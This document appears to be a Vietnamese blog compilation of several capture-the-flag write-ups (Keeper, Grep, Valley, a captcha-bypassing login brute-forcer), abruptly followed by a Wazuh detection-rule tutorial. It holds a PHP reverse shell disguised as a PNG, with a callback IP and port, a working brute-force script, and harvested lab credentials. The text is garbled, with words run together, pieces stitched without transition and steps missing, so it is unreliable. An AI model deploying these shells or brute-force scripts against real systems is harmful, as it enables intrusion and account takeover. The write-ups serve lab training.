PORTSTATESERVICEREASONVERSION22/tcpopensshsyn-ackttl63OpenSSH8.9p1Ubuntu3ubuntu0.3(UbuntuLinux;protocol2.0)|ssh-hostkey:|2563539d439404b1f6186dd7c37bb4b989e(ECDSA)|ecdsa-sha2-nistp256AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKHZRUyrg9VQfKeHHT6CZwCwu9YkJosNSLvDmPM9EC0iMgHj7URNWV3LjJ00gWvduIq7MfXOxzbfPAqvm2ahzTc=|2561ae972be8bb105d5effedd80d8efc066(ED25519)|_ssh-ed25519AAAAC3NzaC1lZDI1NTE5AAAAIBe5w35/5klFq1zo5vISwwbYSVy1Zzy+K9ZCt0px+goO80/tcpopenhttpsyn-ackttl63nginx1.18.0(Ubuntu)|_http-server-header:nginx/1.18.0(Ubuntu)|_http-title:Sitedoesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Truy cập thử vào web với port 80
Tôi sẽ thêm hosts để truy cập domain này
Tôi có một vài thông tin về page này: best practical, RT 4.4.4+dfsg-2ubuntu1 (Debian). Tìm kiếm thông tin trên gu gồ và tôi có tài khoản mặc định ở đây Thử đăng nhập với tài khoản mặc định root:password
Dạo quanh page này, tôi tìm thấy user khác ở Admin -> Users -> Select
Thử đăng nhập ssh bằng user mới
SSH
┌──(root㉿kali)-[/home/kali]└─# ssh lnorgaard@10.10.11.227
Theauthenticityofhost'10.10.11.227 (10.10.11.227)'can't be established.
ED25519 key fingerprint is SHA256:hczMXffNW5M3qOppqsTCzstpLKxrvdBjFYoJXJGpr7w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.227' (ED25519) to the list of known hosts.
lnorgaard@10.10.11.227'spassword:WelcometoUbuntu22.04.3LTS(GNU/Linux5.15.0-78-genericx86_64)*Documentation:https://help.ubuntu.com*Management:https://landscape.canonical.com*Support:https://ubuntu.com/advantageFailedtoconnecttohttps://changelogs.ubuntu.com/meta-release-lts.CheckyourInternetconnectionorproxysettingsYouhavemail.Lastlogin:SunOct1513:42:382023from10.10.14.61lnorgaard@keeper:~$iduid=1000(lnorgaard)gid=1000(lnorgaard)groups=1000(lnorgaard)
Tôi có user.txt ở đây
Privilege escalation
Bên cạnh user.txt, tôi còn 1 file zip nữa RT30000.zip. Unzip nó và tôi được 2 file mới
lnorgaard@keeper:~/RT30000$python3poc.py-dKeePassDumpFull.dmp2023-10-1519:42:03,381[.][main]OpenedKeePassDumpFull.dmpPossiblepassword:●,dgr●dmedfl●dePossiblepassword:●ldgr●dmedfl●dePossiblepassword:●`dgr●dmedfl●dePossiblepassword:●-dgr●dmedfl●dePossiblepassword:●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●de
Tôi không hiểu lắm về các password này, tìm kiếm về các tool keepass trên kali tôi tìm được keepass2
Sau khi add file kdbx, tôi cần phải nhập password. Vậy thì tôi sẽ thử nhập từng password ở phần dump đã tìm được phía trên. Tuy nhiên thì không có cái nào được. Tôi thử sao chép cái password đó lên Gu gồ và được Gu gồ gợi ý sang 1 kết quả khác
Đoạn đầu tiên rất giống với password của tôi nên tôi sẽ thử nó
Vẫn không được. Nhưng tôi thử viết thường tất cả thì được
Tôi có 1 PuTTY key ở đây. Lưu nó về dưới tên root.ppk và sử dụng puttygen để generate được private key của root.
Truy cập vào https://grep.thm, tôi được 1 site login
Ở đây có 1 site login và 1 site register. Tôi đã thử vài cách đơn giản để thử bypass qua nhưng không login được, với site register thì tôi cần phải có API key mới có thể đăng ký được tài khoản
Sau một lúc tìm kiếm xung quanh mà không thấy có gì khả quan về API, tôi nghĩ đến việc thử tìm thông tin về SearchMe, có thể là tên của một theme hoặc cms nào đó.
Trên github tôi tìm thấy source supersecuredeveloper/searchmecms: In progress… mới được tạo 4 tháng trước, khá trùng với thời điểm máy này được tạo trên Tryhackme, nó cũng có phần api như tôi đang tìm kiếm
Có 4 commits, và sau khi kiểm tra các commit này tôi tìm thấy api key
Sử dụng api key để đăng ký tài khoản
Đăng nhập với tài khoản vừa tạo tôi được flag đầu tiên
RCE
Tiếp tục với source code tìm được trên github, tôi còn một phần nữa là upload.php. Tìm nó trên web
Tuy nhiên tôi gặp lỗi khi mở file the image cannot be displayed because it contains errors. Sau một lúc tìm hiểu thì tôi nhận ra mình cần phải thay đổi các file shell nữa.
Shell của tôi sau khi đổi đuôi và các giá trị đầu
�PNGp//php-reverse-shell-AReverseShellimplementationinPHP.Commentsstrippedtoslimitdown.RE:https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php//Copyright(C)2007pentestmonkey@pentestmonkey.netset_time_limit(0);$VERSION="1.0";$ip='10.9.102.40';$port=9001;$chunk_size=1400;$write_a=null;$error_a=null;$shell='uname -a; w; id; sh -i';$daemon=0;$debug=0;
Nó đã mất định dạng php. Tôi cần thêm vài ký tự đầu trước <?php nếu không muốn mất định dạng thật của file
....<?php//php-reverse-shell-AReverseShellimplementationinPHP.Commentsstrippedtoslimitdown.RE:https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php//Copyright(C)2007pentestmonkey@pentestmonkey.netset_time_limit(0);$VERSION="1.0";$ip='10.9.102.40';$port=9001;$chunk_size=1400;$write_a=null;$error_a=null;$shell='uname -a; w; id; sh -i';$daemon=0;$debug=0;
Sau khi thay đổi các giá trị đầu của file nó sẽ trở thành như sau
�PNG<?php//php-reverse-shell-AReverseShellimplementationinPHP.Commentsstrippedtoslimitdown.RE:https://raw.githubuserc>//Copyright(C)2007pentestmonkey@pentestmonkey.netset_time_limit(0);$VERSION="1.0";$ip='10.9.102.40';$port=9001;$chunk_size=1400;$write_a=null;$error_a=null;$shell='uname -a; w; id; sh -i';$daemon=0;$debug=0;
Upload lại và tạo listener port 9001
Vào https://grep.thm/api/uploads/ để mở file vừa upload
┌──(root㉿kali)-[/home/kali]└─# nc -lnvp 9001
listeningon[any]9001...connectto[10.9.102.40]from(UNKNOWN)[10.10.221.7]60196Linuxip-10-10-221-75.15.0-1038-aws#43~20.04.1-Ubuntu SMP Fri Jun 2 17:10:57 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
03:10:28up55min,0users,loadaverage:0.00,0.00,0.00USERTTYFROMLOGIN@IDLEJCPUPCPUWHATuid=33(www-data)gid=33(www-data)groups=33(www-data)sh:0:can't access tty; job control turned off
$
Để đỡ mất thời gian thì tôi sẽ tải linPEAS lên máy này để nó phân tích
Site yêu cầu email, tuy nhiên nhập thử mail tôi vừa đăng ở tài khoản phía trên thì không được.
Tiếp theo là file config db
www-data@ip-10-10-221-7:/tmp$cat/etc/phpmyadmin/config-db.php<?php##
## database access settings in php format
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
## by /usr/sbin/dbconfig-generate-include
##
## by default this file is managed via ucf, so you shouldn't have to
## worry about manual changes being silently discarded. *however*,
## you'll probably also want to edit the configuration file mentioned
## above too.
##
$dbuser='phpmyadmin';$dbpass='tryhackme';$basepath='';$dbname='phpmyadmin';$dbserver='localhost';$dbport='3306';$dbtype='mysql';
PORTSTATESERVICEREASONVERSION22/tcpopensshsyn-ackttl63OpenSSH8.2p1Ubuntu4ubuntu0.5(UbuntuLinux;protocol2.0)|ssh-hostkey:|3072c2:84:2a:c1:22:5a:10:f1:66:16:dd:a0:f6:04:62:95(RSA)|ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABgQCf7Zvn7fOyAWUwEI2aH/k8AyPehxzzuNC1v4AAlhDa4Off4085gRIH/EXpjOoZSBvo8magsCH32JaKMMc59FSK4canP2I0VrXwkEX0F8PjA1TV4qgqXJI0zNVwFrfBORDdlCPNYiqRNFp1vaxTqLOFuHt5r34134yRwczxTsD4Uf9Z6c7Yzr0GV6NL3baGHDeSZ/msTiFKFzLTTKbFkbU4SQYc7jIWjl0ylQ6qtWivBiavEWTwkHHKWGg9WEdFpU2zjeYTrDNnaEfouD67dXznI+FiiTiFf4KC9/1C+msppC0o77nxTGI0352wtBV9KjTU/Aja+zSTMDxoGVvo/BabczvRCTwhXxzVpWNe3YTGeoNESyUGLKA6kUBfFNICrJD2JR7pXYKuZVwpJUUCpy5n6MetnonUo0SoMg/fzqMWw2nCZOpKzVo9OdD8R/ZTnX/iQKGNNvgD7RkbxxFK5OA9TlvfvuRUQQaQP7+UctsaqG2F9gUfWorSdizFwfdKvRU=|25642:9e:2f:f6:3e:5a:db:51:99:62:71:c4:8c:22:3e:bb(ECDSA)|ecdsa-sha2-nistp256AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNIiJc4hdfcu/HtdZN1fyz/hU1SgSas1Lk/ncNc9UkfSDG2SQziJ/5SEj1AQhK0T4NdVeaMSDEunQnrmD1tJ9hg=|2562e:a0:a5:6c:d9:83:e0:01:6c:b9:8a:60:9b:63:86:72(ED25519)|_ssh-ed25519AAAAC3NzaC1lZDI1NTE5AAAAIEZhkboYdSkdR3n1G4sQtN4uO3hy89JxYkizKi6Sd/Ky80/tcpopenhttpsyn-ackttl63Apachehttpd2.4.41((Ubuntu))|_http-server-header:Apache/2.4.41(Ubuntu)|http-methods:|_SupportedMethods:OPTIONSHEADGETPOST|_http-title:Sitedoesn't have a title (text/html).
37370/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Kiểm tra qua port 37370 ftp với user mặc định nhưng không thu được kết quả gì, tôi chuyển qua port 80 với web service
Sau khi lướt qua 1 vòng trang web và không thấy có gì nổi bật, đơn thuần chỉ là 1 trang web html, tôi thử tìm các directory bằng gobuster
┌──(root㉿kali)-[/home/kali]└─# gobuster dir -u http://10.10.35.151/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 100
===============================================================Gobusterv3.5byOJReeves(@TheColonial)&ChristianMehlmauer(@firefart)===============================================================[+]Url:http://10.10.35.151/[+]Method:GET[+]Threads:100[+]Wordlist:/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt[+]NegativeStatuscodes:404[+]UserAgent:gobuster/3.5[+]Timeout:10s===============================================================2023/07/2303:07:33Startinggobusterindirectoryenumerationmode===============================================================/gallery(Status:301)[Size:314][-->http://10.10.35.151/gallery/]/static(Status:301)[Size:313][-->http://10.10.35.151/static/]/pricing(Status:301)[Size:314][-->http://10.10.35.151/pricing/]Progress:87623/87665(99.95%)===============================================================2023/07/2303:11:09Finished===============================================================
Với gallery thì đây là nơi show ảnh, static là nơi chứa các ảnh. Với pricing, trong này chứa 1 file note.txt
J,Pleasestopleavingnotesrandomlyonthewebsite-RP
Điều này có nghĩa là trang web vẫn còn gì đó ở ngay front-end mà tôi chưa tìm ra.
Quay trở lại gallery, source web cho tôi thông tin về phần ảnh.
Vậy là các ảnh được đánh số thứ tự và được lưu trong static, nhưng khi vào static thì ở đây trống trơn, không có gì cả. Rất có thể trong này có chứa một cái gì đó khác ngoài 18 bức ảnh trên nên mới bị ẩn đi.
Tôi sẽ dùng gobuster để thử tìm các dir bị ẩn đằng sau static
┌──(root㉿kali)-[/home/kali]└─# gobuster dir -u http://10.10.35.151/static/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 100
===============================================================Gobusterv3.5byOJReeves(@TheColonial)&ChristianMehlmauer(@firefart)===============================================================[+]Url:http://10.10.35.151/static/[+]Method:GET[+]Threads:100[+]Wordlist:/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt[+]NegativeStatuscodes:404[+]UserAgent:gobuster/3.5[+]Timeout:10s===============================================================2023/07/2303:16:05Startinggobusterindirectoryenumerationmode===============================================================/00(Status:200)[Size:127]/3(Status:200)[Size:421858]/11(Status:200)[Size:627909]/5(Status:200)[Size:1426557]
Tôi có thêm path /00. Truy cập nó và tôi có vài dòng note
Không có gì đặc biệt, tuy nhiên tôi để ý thấy có 1 script tên dev.js
constloginForm=document.getElementById("login-form");constloginButton=document.getElementById("login-form-submit");constloginErrorMsg=document.getElementById("login-error-msg");loginForm.style.border='2px solid #ccc';loginForm.style.padding='20px';loginButton.style.backgroundColor='#007bff';loginButton.style.border='none';loginButton.style.borderRadius='5px';loginButton.style.color='#fff';loginButton.style.cursor='pointer';loginButton.style.padding='10px';loginButton.style.marginTop='10px';functionisValidUsername(username){if(username.length<5){console.log("Username is valid");}else{console.log("Invalid Username");}}functionisValidPassword(password){if(password.length<7){console.log("Password is valid");}else{console.log("Invalid Password");}}functionshowErrorMessage(element,message){consterror=element.parentElement.querySelector('.error');error.textContent=message;error.style.display='block';}loginButton.addEventListener("click",(e)=>{e.preventDefault();constusername=loginForm.username.value;constpassword=loginForm.password.value;if(username==="siemDev"&&password==="california"){window.location.href="/dev1243224123123/devNotes37370.txt";}else{loginErrorMsg.style.opacity=1;}})
Ở phần cuối tôi có username và password, thêm cả 1 path mới. Truy cập vào nó và tôi có gợi ý tiếp theo
Tải 3 file pcap này về và dùng Wireshark để phân tích.
Sau một lúc khá lâu thì tôi đã tìm thấy thứ mình cần trong file siemHTTP2.pcapng
POST/index.htmlHTTP/1.1Host:192.168.111.136User-Agent:Mozilla/5.0(X11;Linuxx86_64;rv:102.0)Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip,deflateContent-Type:application/x-www-form-urlencodedContent-Length:42Origin:http://192.168.111.136Connection:keep-aliveReferer:http://192.168.111.136/index.htmlUpgrade-Insecure-Requests:1uname=valleyDev&psw=ph0t0s1234&remember=onHTTP/1.1200OKDate:Mon,06Mar202321:05:08GMTServer:Apache/2.4.55(Debian)Last-Modified:Mon,06Mar202320:46:17GMTETag:"2fc-5f64162f52399-gzip"Accept-Ranges:bytesVary:Accept-EncodingContent-Encoding:gzipContent-Length:369Keep-Alive:timeout=5,max=100Connection:Keep-AliveContent-Type:text/html...........RMO.0...WX..UpDi.Bp.0!qFI....$$.>.=I..mP........|c}.BQgM.:S.a.R...H..K.lV-.x..@i.Bl..e.....X.9.^......n.L.@h*.c...al....\-.(~.k!QC.[....Y.e...../d...2.1n.........Baku.....z..3H...<~...:...va...Q....ob7u.J.>.G....Z.D.Lpa.}..x.Mg"s...g..D...V.C.}...Rxb..c/...m
..#..l.....:.I......o..../7......i<....F..dX....)..f..V.X.X.....)..U...x!.7...|^.'_...Q?.%....GET /img_avatar2.webp HTTP/1.1
Host: 192.168.111.136
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.111.136/index.html
HTTP/1.1 404 Not Found
Date: Mon, 06 Mar 2023 21:05:09 GMT
Server: Apache/2.4.55 (Debian)
Content-Length: 277
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTDHTML2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.55 (Debian) Server at 192.168.111.136 Port 80</address>
</body></html>
SSH
Thử nhập username và password này vào phần login trên trang web nhưng không được, vào ftp cũng không được. Vậy thì chỉ còn ssh trên port 22
┌──(root㉿kali)-[/home/kali/Downloads]└─# ssh valleyDev@10.10.35.151
Theauthenticityofhost'10.10.35.151 (10.10.35.151)'can't be established.
ED25519 key fingerprint is SHA256:cssZyBk7QBpWU8cMEAJTKWPfN5T2yIZbqgKbnrNEols.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.35.151' (ED25519) to the list of known hosts.
valleyDev@10.10.35.151'spassword:WelcometoUbuntu20.04.6LTS(GNU/Linux5.4.0-139-genericx86_64)*Documentation:https://help.ubuntu.com*Management:https://landscape.canonical.com*Support:https://ubuntu.com/advantage*IntroducingExpandedSecurityMaintenanceforApplications.Receiveupdatestoover25,000softwarepackageswithyourUbuntuProsubscription.Freeforpersonaluse.https://ubuntu.com/provalleyDev@valley:~$iduid=1002(valleyDev)gid=1002(valleyDev)groups=1002(valleyDev)valleyDev@valley:~$
Tuy nhiên để file này có thể chạy được, tôi cần hệ thống chạy 1 file python nào đó và có import thư viện base64. Và sau khi tìm kiếm 1 lúc thì tôi đã thấy nó trong phần crontab
Điều này có nghĩa là root được đặt lịch để chạy tự động file photosEncrypt.py. Kiểm tra file này
#!/usr/bin/python3
importbase64foriinrange(1,7):# specify the path to the image file you want to encode
image_path="/photos/p"+str(i)+".jpg"# open the image file and read its contents
withopen(image_path,"rb")asimage_file:image_data=image_file.read()# encode the image data in Base64 format
encoded_image_data=base64.b64encode(image_data)# specify the path to the output file
output_path="/photos/photoVault/p"+str(i)+".enc"# write the Base64-encoded image data to the output file
withopen(output_path,"wb")asoutput_file:output_file.write(encoded_image_data)
Có import base64. Vậy thì chỉ cần thêm payload phía trên vào file base64.py và chờ 1 lúc
Ngay ở Task 1 tôi đã được cung cấp 1 thư mục chứa 2 file là danh sách usernames và passwords, có thể nghĩ ngay đến việc sử dụng 2 list này để brute-force.
Bài này cũng không cần thiết phải scan port vì ở phần mô tả đã cho tôi sẵn phải truy cập vào http://MACHINE-IP, nghĩa là chỉ có port 80 đang mở.
Sau khi chạy máy và truy cập vào web tôi được 1 site login.
Sau khi thử login vài lần thì tôi bị dính captcha. Vậy là web có cơ chế rate limit để tránh brute-force. Tuy nhiên, captcha này chỉ là các phép tính cộng trừ nhân chia các số tự nhiên, vậy nên tôi có thể nghĩ đến việc viết python script để bypass captcha này trong mỗi phiên brute-force.
Python script
Với sự giúp đã của ChatGPT, tôi có thể viết lại script như sau.
Import requests để lấy Session, sử dụng để brute force, import thêm re để sử dụng các biểu thức chính quy.
Đầu tiên tôi cần phải lấy từng dòng trong 2 file usernames.txt và passwords.txt ra để làm username và password, loại bỏ dấu xuống dòng, chỉ lấy đúng phần text trong từng dòng.
Khi đăng nhập sai, trang web hiện Error: The user does not exist.
Vậy thì tôi sẽ brute force username trước bằng cách kiểm tra xem khi nào dữ liệu trả về không chứa đoạn ký tự does not exist, đó là username hợp lệ cần tìm.
foruserinusernames:response=session.post(url,data=data)data['username']=userif'does not exist'notinresponse.text:print(f'Found username: {user}')print(f'Attempting to brute forcing passowrd for user: {user}')
Tiếp theo, cần có thêm 1 hàm để giải captcha sau mỗi phiên đăng nhập sai. Sử dụng biểu thức chính quy để định dạng phép tính của captcha.
(\s\s\d+\s[+*-/]\s\d+)\s\=\s\?
Sử dụng hàm complie() để đọc biểu thức chính quy trên. Sử dụng hàm findall() trả về tất cả kết quả khớp với mẫu trong chuỗi. Sử dụng hàm eval() để trả về kết quả mà biểu thức phía trên thực hiện.
Cuối cùng, tôi sẽ ghép các phần lại với nhau. Đầu tiên, tạo post session chứa data là username và password.
Nếu trong response trả về không có chứa đoạn ký tự does not exist, đó là username hợp lệ cần tìm
Nếu trong response trả về có chứa đoạn ký tự Captcha enabled thì gọi hàm solve_captcha để xử lý.
Nếu trong response trả về không có chứa đoạn ký tự Error, đó là password hợp lệ cần tìm
Script cuối cùng của tôi sẽ trông như thế này
#! /usr/bin/python
fromrequestsimportSessionimportreurl="http://10.10.140.153/login"# Removing the line feed (\n) from the usernames and passwords read from the respective files
usernames=open('username.txt','r').read().splitlines()passwords=open('password.txt','r').read().splitlines()defsolve_captcha(response):captcha_syntax=re.compile(r'(\s\s\d+\s[+*-/]\s\d+)\s\=\s\?')captcha=captcha_syntax.findall(response)returneval(' '.join(captcha))#initializing a session
session=Session()data={'username':'username','password':'password'}# create a post request to the url with the payload/data using the session opened
response=session.post(url,data=data)foruserinusernames:response=session.post(url,data=data)data['username']=userif'Captcha enabled'inresponse.text:captcha_result=solve_captcha(response.text)data['captcha']=captcha_resultresponse=session.post(url,data=data)if'does not exist'notinresponse.text:print(f'Found username: {user}')print(f"Trying brute force passowrd for user: {user}")forpasswordinpasswords:captcha_result=solve_captcha(response.text)data['password']=passworddata['captcha']=captcha_resultresponse=session.post(url,data=data)if'Error'notinresponse.text:print(f'----> Found Username: {user} Password: {password} ')exit()else:print(f'[*]Trying password: {password} for user ')else:print(f'[*] Trying brute force password for user: {user}')
Sau khi đã biên dịch log để Wazuh có thể hiểu được log của chúng ta đang “nói” gì, việc tiếp theo là làm cho nó hiện lên màn hình (dashboard) của chúng ta. Không phải tất cả các log Wazuh nhận được sẽ đều hiển thị lên màn hình, việc này sẽ gây loãng thông tin, làm cho quản trị viên mất rất nhiều thời gian để quản lý cũng như xác định đúng hiểm họa đang xảy ra đối với tổ chức của mình.
Việc viết rule chính là để “nói” cho Wazuh biết log nào cần hiển thị, hiển thị nó như thế nào và quan trọng nhất là dựa vào decoder nào.
Cũng giống như decoder con phụ thuộc vào decoder cha, rule khi được viết ra cũng phải dựa trên decoder cha. Vì Wazuh “làm việc” với decoder chứ không phải log, vậy nên nếu không theo decoder nào thì rule đó không có nội dung và cũng không có ý nghĩa.
Giống như Decoder, Rules cũng có những tùy chọn để định cấu hình. Documentation của Wazuh đã định nghĩa tất cả các tùy chọn có thể được sử dụng trong khi viết rules. Tuy nhiên tôi cũng sẽ liệt kê những gì tôi hay dùng nhất.
Các tùy chọn khác có thể được dùng trong các trường hợp nhất định tùy thuộc vào đặc điểm nội dung của các loại log có trong hệ thống.
Viết như thế nào?
Tương tự như decoder, các rules cũng được viết dưới dạng XML, và như có đề cập ở trên, rule được viết dựa trên các trường của decoder, ngoài ra chúng ta cũng có thể dựa vào nội dung của log làm điều kiện để viết rule một cách chi tiết nhất.
Các rule này không nhất thiết phải sinh theo dạng cha-con, chúng có thể được tạo độc lập với nhau và đại diện cho một đặc điểm nào đó xuất hiện trong decoder.
Tôi sẽ quay lại ví dụ như đã làm ở decoder cho có tính thống nhất.
Đầu tiên tôi sẽ cho nó vào 1 group nhằm mục đích tập hợp nhóm các loại rule dựa trên log có cùng đặc điểm chung. Ví dụ như log trên nhận được dưới dạng CEF (Common Event Format) và đây là log của Imperva, nên tôi sẽ cho các rule này vào nhóm Imperva và CEF
<groupname="Imperva,CEF,"></group>
Bây giờ các rule về Imperva sẽ được viết bên trong group này.
Mặc dù rule không cần thiết phải viết dưới dạng cha-con, nhưng để cho rõ ràng và có hệ thống, tôi vẫn sẽ tạo rule đầu tiên chứa decoder mà rule sẽ phụ thuộc và thêm mô tả cho nó, coi nó giống như rule cha. Tất cả các rule tiếp theo chỉ cần phụ thuộc vào cha thì sẽ không cần khai báo lại decoder nữa.
Mỗi rule khi sinh ra đều phải có id và level - mức độ nghiêm trọng. Level sẽ quyết định xem rule nào được coi là cảnh báo (alert) xuất hiện trên dashboard còn rule nào thì không. Tiếp theo, <decoder_as> là trường dùng dể xác định rule này dựa tren decoder nào. Cuối cùng là <description> là mô tả của rule, trên dashboard của tôi sẽ sẽ hiện mô tả này.
Cấu hình mặc định của Wazuh cho chúng ta cảnh báo từ level 3, nghĩa là các log thuộc level 0 - 2 sẽ không được coi là alert và không hiện trên dashboard. Tôi sẽ cũng để theo cấu hình mặc định của Wazuh. Thực ra việc để cấu hình level bao nhiêu không quan trọng vì tôi có thể sửa được level của rule theo mức độ nghiêm trọng và theo cấu hình của Wazuh.
Bây giờ tôi sẽ xác định xem log này có những gì để có thể là điều kiện để viết rule cảnh báo. Để ý 1 chút thì tôi có trường cs5Label có giá trị là Description, có thể suy ra trường này là miêu tả cho trường cs5. cs5 có giá trị là Nmap scanner, vậy thì trường có thể là đại diện cho nội dung của log này, tôi có thể dựa vào cs5 làm điều kiện phụ thuộc để viết rule.
Tôi đặt id của rule này là 82023. Với level 12 thì rule này sẽ sinh ra alert ở mức Critical - nghiêm trọng và sẽ báo đỏ trên dashboard, nhằm thông báo cho quản trị viên biết hệ thống đang bị rò quét port.
Với <if_sid> 82002 nghĩa là rule 82023 này sẽ phụ thuộc vào rule 82002, nếu log không được phát hiện bởi 82002 thì 82023 cũng sẽ không được kích hoạt.
Trường <match> dùng để xác định ký tự tồn tại trong log. Nếu như trong log có xuất hiện text “Nmap scanner” thì rule này sẽ được kích hoạt.
<description> sử dụng $(cs5) chỉ định rằng nếu rule này được kích hoạt thì mô tả của cảnh báo này sẽ xuất hiện với nội dung của trường cs5
Còn <mitre> là trường dùng để gắn các kỹ thuật được định nghĩa tại MITRE ATT&CK®. Để gắn được giá trị này cần có hiểu biết về nó. Tôi sẽ viết về phần này trong 1 bài riêng.
root@dc-siemtest:/home/siemadmin# /var/ossec/bin/wazuh-logtest
Startingwazuh-logtestv4.4.5TypeonelogperlineCEF:0|ImpervaInc.|SecureSphere|10.6.0|RecommendedSignaturesPolicyforWebApplications|RecommendedSignaturesPolicyforWebApplications|High|act=Blockdst=10.11.12.13dpt=443duser=n/asrc=103.187.191.141spt=36614proto=TCPrt=Apr26202313:08:12cat=Alertcs1=RecommendedSignaturesPolicyforWebApplicationscs1Label=Policycs2=mail.re-toor.vncs2Label=ServerGroupcs3=mailcs3Label=ServiceNamecs4=mail.re-toor.vncs4Label=ApplicationNamecs5=Nmapscannercs5Label=Description**Phase1:Completedpre-decoding.fullevent:'CEF:0|Imperva Inc.|SecureSphere|10.6.0|Recommended Signatures Policy for Web Applications|Recommended Signatures Policy for Web Applications|High|act=Block dst=10.11.12.13 dpt=443 duser=n/a src=103.187.191.141 spt=36614 proto=TCP rt=Apr 26 2023 13:08:12 cat=Alert cs1=Recommended Signatures Policy for Web Applications cs1Label=Policy cs2=mail.re-toor.vn cs2Label=ServerGroup cs3=mail cs3Label=ServiceName cs4=mail.re-toor.vn cs4Label=ApplicationName cs5=Nmap scanner cs5Label=Description'**Phase2:Completeddecoding.name:'Imperva'action:'Block'application:'SecureSphere'cat:'Alert'cs1:'Recommended Signatures Policy for Web Applications'cs1Label:'Policy'cs2:'mail.re-toor.vn'cs2Label:'ServerGroup'cs3:'mail'cs3Label:'ServiceName'cs4:'mail.re-toor.vn'cs4Label:'ApplicationName'cs5:'Nmap scanner'dpt:'443'dst:'10.11.12.13'duser:'n/a'event.name:'Recommended Signatures Policy for Web Applications'event.type:'Recommended Signatures Policy for Web Applications'protocol:'TCP'rt:'Apr 26 2023 13:08:12'severity:'High'src:'103.187.191.141'version:'10.6.0'**Phase3:Completedfiltering(rules).id:'82023'level:'12'description:'Nmap scanner'groups:'['Imperva', 'CEF']'firedtimes:'1'mail:'True'mitre.id:'['T1046']'mitre.tactic:'['Discovery']'mitre.technique:'['NetworkServiceDiscovery']'**Alerttobegenerated.
Như vậy là rule đã được tạo thành công.
Phần kết
Với Wazuh, decoder và rule đều được chia làm 2 phần là mặc định và tùy chỉnh.
Option
Path
Default
/var/ossec/ruleset
Custom
/var/ossec/etc
Phần mặc định (default) là các decoders và rules được Wazuh viết sẵn, không thể thay đổi hay ghi đè các file này ở trên dashboard. Và cho dù tôi có cố gắng thay đổi nó bằng việc chỉnh sửa file trong server, thì khi cập nhật các phiên bản mới của Wazuh, mọi thay đổi của tôi cũng sẽ quay về mặc định. Tôi chỉ có thể tạo rule mới và ghi đề vào rule cũ với lệnh overwrite
Phần custom là các decoders và rule được người quản trị tự tạo.
Lưu ý: decoders và rules chỉ có thể được kích hoạt nếu nằm đúng vị trí trong các thư mục phía trên.
Mỗi rule và decoder khi được tạo mới hay có bất kỳ thay đổi gì đều phải restart lại Wazuh-manager. Tôi đã tạo và cập nhật custom decoders - rules của mình ở đây.
